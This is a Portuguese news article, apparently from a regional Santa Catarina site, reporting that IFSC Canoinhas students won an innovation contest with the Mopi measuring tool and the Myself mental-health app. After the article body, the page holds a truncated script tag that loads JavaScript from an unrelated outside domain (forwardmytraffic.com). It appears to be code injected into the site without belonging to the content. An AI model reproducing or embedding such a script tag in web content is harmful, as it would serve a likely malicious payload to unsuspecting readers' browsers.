InícioDestaqueProjetos de estudantes do IFSC de Canoinhas vencem concurso de ideias inovadoras

Projetos de estudantes do IFSC de Canoinhas vencem concurso de ideias inovadoras

Últimas notícias

Mulher sofre tentativa de homicídio em padaria no centro de Canoinhas

Na manhã dessa quinta-feira, 10, os bombeiros e polícia...

Alerta: Golpe do MEI

Atenção Microempreendedores Individuais! Os golpes estão cada vez mais...

Três Barras inicia campanha de vacinação contra a gripe

A Prefeitura de Três Barras, por meio da Secretaria...

O Câmpus Canoinhas do Instituto Federal de Santa Catarina (IFSC) garantiu o primeiro e o quarto lugar no Desafio IFSC de Ideias Inovadoras, um concurso interno de caráter educacional voltado à promoção do empreendedorismo e da inovação tecnológica no IFSC. A equipe Mopi, formada pelos estudantes Vanessa Rocha da Silva e Thomas Cordeiro Paulo, venceu a competição com o projeto de medição de baixo custo para objetos de processos industriais, batizado de Mopi, e vai receber R$ 15 mil para a concretização da ideia. Em quarto lugar, Evelin Karpavicius dos Santos, Andressa Theodoro Pires de Oliveira e Mateus Ferreira de Souza, da equipe Tech Ninjas, vão receber R$ 6 mil para desenvolver o aplicativo Myself, idealizado para auxiliar processos terapêuticos na área de saúde mental. Os cinco estudantes fazem o curso superior de tecnologia em Análise e Desenvolvimento de Sistemas e foram orientados pelo professor Lucas Bueno.

 

 

“Com certeza estamos muito realizados. Trabalhamos muito para chegarmos a esse resultado, que foi fruto de muito esforço e dedicação da equipe e, claro, do nosso orientador. O professor Lucas foi impecável em todos os seus ensinamentos, o que fez com que a gente alcançasse esse resultado tão esperado”, destacam Vanessa e Thomas, que já estão trabalhando na execução das metas programadas no projeto.

 

 

Para Evelin, Andressa e Mateus, o sentimento de realização e gratidão não é diferente. “Estamos muito emocionados. A ficha demorou para cair que realmente tínhamos ganhado”, comentam. “Aprendemos muito participando do Desafio, especialmente a trabalhar em grupo, dedicar horas ao estudo, organizar as ideias e trabalhar no sentido de buscar uma solução para um problema real”, enfatizam os estudantes da Tech Ninjas, que têm como próxima missão adaptar o seu plano de aplicação ao prêmio conquistado.

 

 

Conheça os projetos

Muitas etapas dos processos industriais envolvem a medição de objetos durante a produção. Nas madeireiras, um exemplo é a medição do diâmetro de uma tora de madeira, após a remoção da casca da árvore, para o corte das lâminas. É para este setor e similares que Vanessa e Thomas idealizaram um projeto de medição de baixo custo, o Mopi. “Em várias indústrias, este processo é realizado de maneira manual, pois as soluções existentes para automação da medição possuem custos elevados. A medição manual implica em erros e consequente diminuição da produtividade e dos lucros. Propomos uma ferramenta de baixo custo para automação da medição do diâmetro, comprimento e altura de objetos durante o processo de produção”, contam.

 

 

O outro projeto é um aplicativo para smartphones que tem como objetivo auxiliar no acompanhamento de processos terapêuticos na área de saúde mental. O Myself, idealizado por Evelin, Andressa e Mateus, é destinado a psicólogos e psiquiatras poderem acompanhar seus pacientes no intervalo entre as sessões presenciais. “Pelo aplicativo, os pacientes poderão fazer o registro de sintomas, emoções, pensamentos, alterações de humor e episódios de crise, de uma forma interativa e simplificada”, explicam os alunos, lembrando que os dados serão registrados pelo paciente de acordo com as perguntas sugeridas pelo terapeuta e em decorrência do quadro clínico atendido.

 … src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.